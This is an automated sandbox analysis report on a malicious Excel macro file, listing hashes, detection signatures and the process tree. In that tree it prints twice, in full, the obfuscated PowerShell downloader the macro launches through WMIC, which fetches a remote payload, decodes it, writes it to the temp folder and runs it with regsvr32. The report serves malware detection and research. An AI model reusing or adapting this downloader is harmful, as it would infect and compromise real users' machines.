Analysis
-
max time kernel
138s -
max time network
137s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
16-07-2020 13:27
Static task
static1
Behavioral task
behavioral1
Sample
8-409-98186.xlsm
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
8-409-98186.xlsm
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
8-409-98186.xlsm
-
Size
45KB
-
MD5
2540aea01c233fc9be8a70a5ad3b23b1
-
SHA1
66f7d36292484d031ebcac700230dbb4f6f3c70b
-
SHA256
fc27d175081d94e309d0b60062c573b3975dcdcd70545f8be8af8a11ba616b96
-
SHA512
050bd4ad6ddb06b31f7c94e674568737727521ee1db0a8ec22ce5cd176946e7e07027e5cf1469242311688862560926a777ee879367fac8ddad1142bf4b63f6f
Score
10/10
Malware Config
Signatures
-
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE 3656 EXCEL.EXE -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1616 3656 wMiC.exe 65 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3020 1060 POwERSheLL.exe 67 -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3656 wrote to memory of 1616 3656 EXCEL.EXE 75 PID 3656 wrote to memory of 1616 3656 EXCEL.EXE 75 PID 3020 wrote to memory of 3388 3020 POwERSheLL.exe 79 PID 3020 wrote to memory of 3388 3020 POwERSheLL.exe 79 -
Blacklisted process makes network request 1 IoCs
flow pid Process 23 3020 POwERSheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3656 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1616 wMiC.exe Token: SeSecurityPrivilege 1616 wMiC.exe Token: SeTakeOwnershipPrivilege 1616 wMiC.exe Token: SeLoadDriverPrivilege 1616 wMiC.exe Token: SeSystemProfilePrivilege 1616 wMiC.exe Token: SeSystemtimePrivilege 1616 wMiC.exe Token: SeProfSingleProcessPrivilege 1616 wMiC.exe Token: SeIncBasePriorityPrivilege 1616 wMiC.exe Token: SeCreatePagefilePrivilege 1616 wMiC.exe Token: SeBackupPrivilege 1616 wMiC.exe Token: SeRestorePrivilege 1616 wMiC.exe Token: SeShutdownPrivilege 1616 wMiC.exe Token: SeDebugPrivilege 1616 wMiC.exe Token: SeSystemEnvironmentPrivilege 1616 wMiC.exe Token: SeRemoteShutdownPrivilege 1616 wMiC.exe Token: SeUndockPrivilege 1616 wMiC.exe Token: SeManageVolumePrivilege 1616 wMiC.exe Token: 33 1616 wMiC.exe Token: 34 1616 wMiC.exe Token: 35 1616 wMiC.exe Token: 36 1616 wMiC.exe Token: SeIncreaseQuotaPrivilege 1616 wMiC.exe Token: SeSecurityPrivilege 1616 wMiC.exe Token: SeTakeOwnershipPrivilege 1616 wMiC.exe Token: SeLoadDriverPrivilege 1616 wMiC.exe Token: SeSystemProfilePrivilege 1616 wMiC.exe Token: SeSystemtimePrivilege 1616 wMiC.exe Token: SeProfSingleProcessPrivilege 1616 wMiC.exe Token: SeIncBasePriorityPrivilege 1616 wMiC.exe Token: SeCreatePagefilePrivilege 1616 wMiC.exe Token: SeBackupPrivilege 1616 wMiC.exe Token: SeRestorePrivilege 1616 wMiC.exe Token: SeShutdownPrivilege 1616 wMiC.exe Token: SeDebugPrivilege 1616 wMiC.exe Token: SeSystemEnvironmentPrivilege 1616 wMiC.exe Token: SeRemoteShutdownPrivilege 1616 wMiC.exe Token: SeUndockPrivilege 1616 wMiC.exe Token: SeManageVolumePrivilege 1616 wMiC.exe Token: 33 1616 wMiC.exe Token: 34 1616 wMiC.exe Token: 35 1616 wMiC.exe Token: 36 1616 wMiC.exe Token: SeDebugPrivilege 3020 POwERSheLL.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3020 POwERSheLL.exe 3020 POwERSheLL.exe 3020 POwERSheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8-409-98186.xlsm"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
PID:3656 -
C:\Windows\System32\Wbem\wMiC.exewMiC prOCeSS CalL 'crEaTe' "POwERSheLL -WIN hIDden -nOniNteraC -execUTIo BYPaSs -noproF Set BM (([CHAr]34).ToStRING() ) ;SV ('6S') ( [STRiNg][CHAr]44 ) ; "\"nal vp New-Object -F;`$aa='rexo';`$cc='om /mabu';`${Yl}='';`${S}=0;`${G}=1;`${n`N}=10*10;function m`2(`${ih}){`$(`${iH}.substring(`${g}) -replace('-'${6S}`${Y`L})) -replace('S'${6S}`${YL});return `${_}};`${MK}='a';`${y`M}='n';+'';`${CC}=`${CC}.split(' ');`${S`s}=&('m2')((.('g'+'wmi') ('Win'+'3'+'2_c'+'omp'+'utersystempro'+'duct')).uuid);`${e}='ht'+'t'+(${BM}{1}{0}${BM}-f ':/'${6S}'ps')+`${Cc}[`${G}]+`${Aa}+'.c'+(`${cc}[`${S}${6S}`${g}] -replace '(\D{5})'${6S}'/')+'?'+`${sS};.('sa'+'l') ('ss') ('regsv'+'r3'+'2');&('Si') ('Va'+'r'+'i'+'able:/f') `${E}.replace(' '${6S}`${yl});`${H`B}=`${Y`m}+'t';.('Sv') 1 ${BM}Net.WebClie`$hb${BM};&('SI') ('Variab'+'le:C'+'2') (&('vp') (.('Gv') 1 -Va));&('SV') ('c') ${BM}DownloadDat`$mk${BM};`${o`Ad}=(([Char[]](.('V'+'ariabl'+'e') ('C2') -ValueOn).((.('Va'+'riable') ('c') -Val)).Invoke((&('Vari'+'a'+'ble') ('f')).Value))-Join`${y`L});`${T`FG}=`${EN`V:t`eMp};`${mI}=(`${d}=.('gc'+'i') `${T`FG}|&('get'+'-ra'+'ndom')).name -replace ${BM}.{4}`$${BM};`${W}=`${t`FG}+'\'+`${mi}+'.';`${vM}=`${o`Ad}.substring(`${s}${6S}`${G});`${p}=[int]`${VM}*`${nn};`${l`qA} =`${o`Ad}.remove(`${S}${6S}`${G});`${PL}=`${L`qA} -split'!';`${J`P}=[Text.Encoding]::UTF8;function va(`${zx}){`${sa}=[Convert]::FromBase64String(`${zX});return `${S`A}};foreach(`${iT} in `${pl}[`${s}]){`${g}=@();`${P`pT}=`${vM}.ToCharArray();`${It}=.('va')(`${it});for(`${J`l}=`${S}; `${J`L} -lt `${IT}.count; `${jl}++){`${G} += [char]([Byte]`${I`T}[`${J`L}] -bxor[Byte]`${p`Pt}[`${j`L}%`${P`PT}.count])}};`${V`V}=`${l`qa}.Replace((`${PL}[`${s}]+${BM}!${BM})${6S}`${j`p}.GetString(`${g}));[io.file]::WriteAllBytes(`${W}${6S}(.('va')(`${VV} -replace ${BM}.{200}`$${BM})));if((.('gc'+'i') `${w}).Length -lt `${p}){exit};&('sle'+'ep') 22;.('ss') -s `${w};.('sle'+'ep') 29;[io.file]::WriteAllLines(`${w}${6S}[regex]::replace(`${Ss}${6S}'\d'${6S}`${M`K}))"\" |&( $PshOME[21]+$PShomE[34]+'x')"2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwERSheLL.exePOwERSheLL -WIN hIDden -nOniNteraC -execUTIo BYPaSs -noproF Set BM (([CHAr]34).ToStRING() ) ;SV ('6S') ( [STRiNg][CHAr]44 ) ; "\"nal vp New-Object -F;`$aa='rexo';`$cc='om /mabu';`${Yl}='';`${S}=0;`${G}=1;`${n`N}=10*10;function m`2(`${ih}){`$(`${iH}.substring(`${g}) -replace('-'${6S}`${Y`L})) -replace('S'${6S}`${YL});return `${_}};`${MK}='a';`${y`M}='n';+'';`${CC}=`${CC}.split(' ');`${S`s}=&('m2')((.('g'+'wmi') ('Win'+'3'+'2_c'+'omp'+'utersystempro'+'duct')).uuid);`${e}='ht'+'t'+(${BM}{1}{0}${BM}-f ':/'${6S}'ps')+`${Cc}[`${G}]+`${Aa}+'.c'+(`${cc}[`${S}${6S}`${g}] -replace '(\D{5})'${6S}'/')+'?'+`${sS};.('sa'+'l') ('ss') ('regsv'+'r3'+'2');&('Si') ('Va'+'r'+'i'+'able:/f') `${E}.replace(' '${6S}`${yl});`${H`B}=`${Y`m}+'t';.('Sv') 1 ${BM}Net.WebClie`$hb${BM};&('SI') ('Variab'+'le:C'+'2') (&('vp') (.('Gv') 1 -Va));&('SV') ('c') ${BM}DownloadDat`$mk${BM};`${o`Ad}=(([Char[]](.('V'+'ariabl'+'e') ('C2') -ValueOn).((.('Va'+'riable') ('c') -Val)).Invoke((&('Vari'+'a'+'ble') ('f')).Value))-Join`${y`L});`${T`FG}=`${EN`V:t`eMp};`${mI}=(`${d}=.('gc'+'i') `${T`FG}|&('get'+'-ra'+'ndom')).name -replace ${BM}.{4}`$${BM};`${W}=`${t`FG}+'\'+`${mi}+'.';`${vM}=`${o`Ad}.substring(`${s}${6S}`${G});`${p}=[int]`${VM}*`${nn};`${l`qA} =`${o`Ad}.remove(`${S}${6S}`${G});`${PL}=`${L`qA} -split'!';`${J`P}=[Text.Encoding]::UTF8;function va(`${zx}){`${sa}=[Convert]::FromBase64String(`${zX});return `${S`A}};foreach(`${iT} in `${pl}[`${s}]){`${g}=@();`${P`pT}=`${vM}.ToCharArray();`${It}=.('va')(`${it});for(`${J`l}=`${S}; `${J`L} -lt `${IT}.count; `${jl}++){`${G} += [char]([Byte]`${I`T}[`${J`L}] -bxor[Byte]`${p`Pt}[`${j`L}%`${P`PT}.count])}};`${V`V}=`${l`qa}.Replace((`${PL}[`${s}]+${BM}!${BM})${6S}`${j`p}.GetString(`${g}));[io.file]::WriteAllBytes(`${W}${6S}(.('va')(`${VV} -replace ${BM}.{200}`$${BM})));if((.('gc'+'i') `${w}).Length -lt `${p}){exit};&('sle'+'ep') 22;.('ss') -s `${w};.('sle'+'ep') 29;[io.file]::WriteAllLines(`${w}${6S}[regex]::replace(`${Ss}${6S}'\d'${6S}`${M`K}))"\" |&( $PshOME[21]+$PShomE[34]+'x')1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3020 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\sa.9PHNB71MKR4J_0_0010_.Public.InstallAgent.2⤵PID:3388
-